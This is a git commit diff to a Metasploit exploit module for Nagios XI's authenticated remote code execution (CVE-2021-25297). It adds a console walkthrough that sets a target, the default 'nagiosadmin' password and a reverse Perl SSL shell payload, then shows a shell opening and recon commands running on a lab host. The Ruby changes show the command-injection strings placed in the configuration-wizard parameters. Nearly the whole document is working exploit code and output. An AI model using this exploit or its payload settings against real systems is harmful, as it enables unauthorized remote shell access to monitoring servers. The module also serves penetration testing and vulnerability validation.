Add example for version 5.5.6 with CVE-2021-25297
This commit is contained in:
parent
489ab24876
commit
52fa2e5be6
|
@ -369,3 +369,83 @@ meterpreter > pwd
|
|||
/usr/local/nagiosxi/html/config
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
### CentOS7 Running NagiosXI 5.5.6 (Official OVA) - CVE-2021-25297
|
||||
```
|
||||
msf6 > use exploit/linux/http/nagios_xi_configwizards_authenticated_rce
|
||||
[*] Using configured payload cmd/unix/reverse_perl_ssl
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RHOSTS 192.168.104.18
|
||||
RHOSTS => 192.168.104.18
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set RPORT 443
|
||||
RPORT => 443
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set SSL true
|
||||
[!] Changing the SSL option's value may require changing RPORT!
|
||||
SSL => true
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set PASSWORD nagiosadmin
|
||||
PASSWORD => nagiosadmin
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set TARGET_CVE CVE-2021-25297
|
||||
TARGET_CVE => CVE-2021-25297
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LHOST 192.168.104.2
|
||||
LHOST => 192.168.104.2
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > set LPORT 8443
|
||||
LPORT => 8443
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > show options
|
||||
|
||||
Module options (exploit/linux/http/nagios_xi_configwizards_authenticated_rce):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FINISH_INSTALL false no If the Nagios XI installation has not been completed, try to do so. This includes signin
|
||||
g the license agreement.
|
||||
PASSWORD nagiosadmin no Password to authenticate with
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS 192.168.104.18 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasp
|
||||
loit
|
||||
RPORT 443 yes The target port (TCP)
|
||||
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local m
|
||||
achine or 0.0.0.0 to listen on all addresses.
|
||||
SRVPORT 8080 yes The local port to listen on.
|
||||
SSL true no Negotiate SSL/TLS for outgoing connections
|
||||
SSLCert no Path to a custom SSL certificate (default is randomly generated)
|
||||
TARGETURI /nagiosxi/ yes The base path to the Nagios XI application
|
||||
TARGET_CVE CVE-2021-25297 yes CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298)
|
||||
URIPATH no The URI to use for this exploit (default is random)
|
||||
USERNAME nagiosadmin no Username to authenticate with
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (cmd/unix/reverse_perl_ssl):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST 192.168.104.2 yes The listen address (an interface may be specified)
|
||||
LPORT 8443 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
2 CMD
|
||||
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 exploit(linux/http/nagios_xi_configwizards_authenticated_rce) > exploit
|
||||
|
||||
[*] Started reverse SSL handler on 192.168.104.2:8443
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] Attempting to authenticate to Nagios XI...
|
||||
[+] Successfully authenticated to Nagios XI.
|
||||
[*] Target is Nagios XI with version 5.5.6.
|
||||
[+] The target appears to be vulnerable.
|
||||
[*] Sending the payload...
|
||||
[*] Command shell session 1 opened (192.168.104.2:8443 -> 192.168.104.18:58930) at 2023-02-07 14:27:41 -0500
|
||||
id
|
||||
uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
|
||||
whoami
|
||||
apache
|
||||
uname -a
|
||||
Linux localhost.localdomain 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
|
||||
```
|
||||
|
|
|
@ -89,6 +89,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
datastore['FINISH_INSTALL']
|
||||
end
|
||||
|
||||
# Returns a status code an a error message on failure.
|
||||
# On success returns the status code and an array so we
|
||||
# can update the login_result and res_array variables appropriately.
|
||||
def handle_unsigned_license(res_array, username, password, finish_install)
|
||||
auth_cookies, nsp = res_array
|
||||
sign_license_result = sign_license_agreement(auth_cookies, nsp)
|
||||
|
@ -128,12 +131,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
when 5 # The license agreement still needs to be signed
|
||||
login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
|
||||
return login_result, res_array unless (login_result == 0)
|
||||
|
||||
end
|
||||
when 5 # The license agreement still needs to be signed
|
||||
login_result, res_array = handle_unsigned_license(res_array, username, password, finish_install)
|
||||
return login_result, res_array unless (login_result == 0)
|
||||
|
||||
end
|
||||
|
||||
print_good('Successfully authenticated to Nagios XI.')
|
||||
|
@ -212,7 +213,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
}
|
||||
# After version 5.5.7, the URL parameter used in CVE-2021-25297 and CVE-2021-25298
|
||||
# changes from address to ip_address
|
||||
if @version >= Rex::Version.new('5.5.6') && @version <= Rex::Version.new('5.5.7')
|
||||
if @version <= Rex::Version.new('5.5.7')
|
||||
address_param = 'address'
|
||||
else
|
||||
address_param = 'ip_address'
|
||||
|
@ -223,10 +224,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
url_params = url_params.merge({
|
||||
'nextstep' => 3,
|
||||
'wizard' => 'windowswmi',
|
||||
'ip_address' => Rex::Text.rand_text_alpha(7..15),
|
||||
'domain' => Rex::Text.rand_text_alpha(7..15),
|
||||
'username' => Rex::Text.rand_text_alpha(7..20),
|
||||
'password' => Rex::Text.rand_text_alpha(7..20),
|
||||
'ip_address' => Array.new(4) { rand(256) }.join('.'),
|
||||
'domain' => Rex::Text.rand_text_alphanumeric(7..15),
|
||||
'username' => Rex::Text.rand_text_alphanumeric(7..20),
|
||||
'password' => Rex::Text.rand_text_alphanumeric(7..20),
|
||||
'plugin_output_len' => Rex::Text.rand_text_numeric(5) + "; #{cmd};"
|
||||
})
|
||||
# CVE-2021-25297 affects the switch configuration wizard.
|
||||
|
@ -235,7 +236,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'nextstep' => 3,
|
||||
'wizard' => 'switch',
|
||||
address_param => Array.new(4) { rand(256) }.join('.') + "\"; #{cmd};",
|
||||
'snmpopts[snmpcommunity]' => Rex::Text.rand_text_alpha(7..15),
|
||||
'snmpopts[snmpcommunity]' => Rex::Text.rand_text_alphanumeric(7..15),
|
||||
'scaninterfaces' => 'on'
|
||||
})
|
||||
# CVE-2021-25298 affects the cloud-vm configuration wizard, which we can access by
|
||||
|
|
Loading…
Reference in New Issue